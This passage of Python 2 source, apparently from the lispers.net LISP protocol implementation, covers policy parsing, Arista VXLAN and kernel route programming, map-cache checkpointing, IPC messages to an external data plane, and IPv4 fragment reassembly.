for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send the supplied CLI command to the Arista system so it can be configured
# via its CLI.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from the VTEP address and associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulate it with a source-port of 4341
# and a destination address and port that were translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the device and next-hop of each IPv4 default route in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
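# Illustrative return value (hypothetical interfaces and next-hops): a host
# with two default routes would return something like
# [["eth0", "192.168.1.1"], ["eth1", "10.0.0.1"]].
#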
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
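# Illustrative commands issued (hypothetical addresses): install=True with
# nh "192.168.1.1" runs "ip route add 10.1.1.1/32 via 192.168.1.1", and
# install=False with nh None runs "ip route delete 10.1.1.1/32".
#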
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
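# Illustrative checkpoint entry (hypothetical EID and RLOCs) produced by this
# function:
#
#   [1000]10.1.0.0/16 rloc 1.1.1.1 1 50, 2.2.2.2 1 50
#
# An entry with no usable RLOCs and a native-forward action is written as
# "[1000]10.1.0.0/16 rloc native-forward".
#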
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
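# Illustrative JSON record (hypothetical EID and RLOC) built below for a
# unicast entry:
#
#   { "type" : "map-cache", "opcode" : "add", "eid-prefix" : "10.1.1.0/24",
#     "instance-id" : "1000", "rlocs" : [ { "rloc" : "1.2.3.4",
#     "priority" : "1", "weight" : "100", "port" : "4341" } ] }
#
# Multicast entries carry an "rles" array instead of "rlocs".
#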
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the "keys" array for both the ITR encryption side and the ETR
# decryption side, as illustrated below.
#
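# Illustrative result (hypothetical key material): for key_type
# "encrypt-key", the entry passed in is extended with:
#
#   "keys" : [ { "key-id" : "1", "encrypt-key" : <ekey>, "icv-key" : <ikey> } ]
#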
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mappings to the ipc-data-plane
# socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# Write the configured interfaces and their instance-IDs to the ipc-data-plane
# socket. This is not done in the lisp-etr process.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return an auth_key{} dictionary where the keys are type
# integers and the values are type string.
#
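# Illustrative results: lisp_parse_auth_key("secret") returns {0: "secret"}
# and lisp_parse_auth_key("[3]foo[5]bar") returns {3: "foo", 5: "bar"}.
#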
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
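# Illustrative queue contents (hypothetical 3000-byte IP payload split across
# two fragments): the first fragment (frag-offset field 0x2000, IP length
# 1500) is queued as [0, 1480, <packet>, False] and the last fragment
# (frag-offset field 0x00b9, IP length 1540) as [1480, 1520, <packet>, True].
# Reassembly proceeds once offset 0 is present, the last-fragment flag is
# seen, and each offset equals the previous offset plus its length.
#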
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialize list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if the first fragment arrived and we determined it's
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove it from the other fragments.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr> in lisp_crypto_
# keys_by_rloc_decap{}.
#
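# Illustrative lookup order (hypothetical address and port): for addr
# 1.2.3.4 and port 31337 the function first tries key "1.2.3.4:31337", then
# "1.2.3.4", and finally promotes the keys from any existing
# "1.2.3.4:<other-port>" entry to "1.2.3.4" before returning that key.
#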
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at a non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal. But this only happens when the
# RLOC is not found in the RLOC-probe list.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
